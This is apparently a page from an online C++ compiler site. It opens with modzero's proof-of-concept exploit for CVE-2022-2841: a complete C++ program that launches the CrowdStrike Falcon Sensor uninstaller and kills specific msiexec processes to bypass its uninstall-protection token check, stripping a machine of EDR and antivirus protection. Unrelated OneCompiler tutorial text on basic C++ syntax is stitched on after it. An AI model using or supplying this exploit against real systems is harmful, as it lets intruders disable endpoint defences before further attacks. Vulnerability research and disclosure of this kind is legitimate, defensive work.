//
// CrowdStrike Falcon Sensor
// De-Installation Auth-Bypass Proof-of-Concept
//
// Falcon Sensor is installed with an uninstall protection, to prevent unauthorized administrators
// from removing Falcon Sensor. The following Proof-of-Concept exploit allows to bypass the
// uninstall protection (token check). This can be used to remove the endpoint's EDR and AV protection.
//
// References:
// - modzero MZ-22-02 Security Advisory
// - CVE: CVE-2022-2841
//
// Version: 0.3
// Secrecy: CONFIDENTIAL
// Copyright 2022, modzero AG, Wartstr. 20, 8400 Winterthur, Switzerland
//
// Usage example:
// .\CSFalconTokenBypass.exe 'C:\ProgramData\Package Cache\{XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX}v6.XX.XX.0\CsAgent.LionLanner.msi'
//
#pragma once
#define _CRT_SECURE_NO_WARNINGS
#include <windows.h>
#include <stdio.h>
#include <tchar.h>
#include <psapi.h>
#include <list>
#include <iostream>
std::list<int> g_msiexec_instances = {};
int g_msiexec_instance_count = 0;
void CheckProcess(DWORD process_id)
{
TCHAR process_name[MAX_PATH] = { 0 };
HANDLE h_proc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, process_id);
if (nullptr != h_proc) {
HMODULE h_mod = 0;
DWORD c_need = 0;
if (EnumProcessModules(h_proc, &h_mod, sizeof(h_mod), &c_need)) {
GetModuleBaseName(h_proc, h_mod, process_name,
sizeof(process_name) / sizeof(char));
}
} else {
return;
}
if (wcsstr(_wcslwr(process_name), __T("msiexec"))) {
bool already_found = (
std::find(
g_msiexec_instances.begin(),
g_msiexec_instances.end(),
process_id) != g_msiexec_instances.end()
);
if (!already_found) {
g_msiexec_instance_count++;
std::cout << "[+] Installer spawned process: " << process_id << std::endl;
g_msiexec_instances.push_front(process_id);
// If it's the third process, we try to kill it to produce open MSIHandles.
// This will break the uninstaller token check.
if (g_msiexec_instance_count == 4 || g_msiexec_instance_count == 5) {
std::cout << "[+] Killing process: " << process_id << std::endl;
if (!TerminateProcess(h_proc, 123)) {
std::cout << "[!] Failed to kill process with PID " << process_id << ": " << GetLastError() << std::endl;
}
if (g_msiexec_instance_count == 5) {
std::cout << "[+] Uninstall Protection should be bypassed." << std::endl;
exit(0);
}
}
}
}
CloseHandle(h_proc);
}
int main(int argc, char* argv[])
{
DWORD proc_ids[1024] = { 0 };
DWORD c_need = 0;
DWORD c_procs = 0;
DWORD i = 0;
if (argc != 2) {
std::cout << "Usage:" << std::endl << argv[0] << " PATH_TO_CsAgent.LionLanner.msi" << std::endl;
return 1;
}
// increase priority to realtime and start uninstall
SetPriorityClass(GetCurrentProcess(), REALTIME_PRIORITY_CLASS);
std::string path = std::string(argv[1]);
unsigned first = path.find("{");
unsigned last = path.find_last_of("}");
std::string guid = path.substr (first,last-first+1);
std::string cmd = "start msiexec /x " + guid;
system(cmd.c_str());
// now listen for processes popping up
while (1) {
if (!EnumProcesses(proc_ids, sizeof(proc_ids), &c_need)) {
std::cout << "[-] Failed to read processes." << std::endl;
return 1;
}
c_procs = c_need / sizeof(DWORD);
// Check every process ID
for (i = 0; i < c_procs; i++) {
if (proc_ids[i] != 0) {
CheckProcess(proc_ids[i]);
}
}
}
return 0;
} Write, Run & Share C++ code online using OneCompiler's C++ online compiler for free. It's one of the robust, feature-rich online compilers for C++ language, running on the latest version 17. Getting started with the OneCompiler's C++ compiler is simple and pretty fast. The editor shows sample boilerplate code when you choose language as C++ and start coding!
OneCompiler's C++ online compiler supports stdin and users can give inputs to programs using the STDIN textbox under the I/O tab. Following is a sample program which takes name as input and print your name with hello.
#include <iostream>
#include <string>
using namespace std;
int main()
{
string name;
cout << "Enter name:";
getline (cin, name);
cout << "Hello " << name;
return 0;
}
C++ is a widely used middle-level programming language.
When ever you want to perform a set of operations based on a condition If-Else is used.
if(conditional-expression) {
//code
}
else {
//code
}
You can also use if-else for nested Ifs and If-Else-If ladder when multiple conditions are to be performed on a single variable.
Switch is an alternative to If-Else-If ladder.
switch(conditional-expression){
case value1:
// code
break; // optional
case value2:
// code
break; // optional
......
default:
code to be executed when all the above cases are not matched;
}
For loop is used to iterate a set of statements based on a condition.
for(Initialization; Condition; Increment/decrement){
//code
}
While is also used to iterate a set of statements based on a condition. Usually while is preferred when number of iterations are not known in advance.
while (condition) {
// code
}
Do-while is also used to iterate a set of statements based on a condition. It is mostly used when you need to execute the statements atleast once.
do {
// code
} while (condition);
Function is a sub-routine which contains set of statements. Usually functions are written when multiple calls are required to same set of statements which increases re-usuability and modularity. Function gets run only when it is called.
return_type function_name(parameters);
function_name (parameters)
return_type function_name(parameters) {
// code
}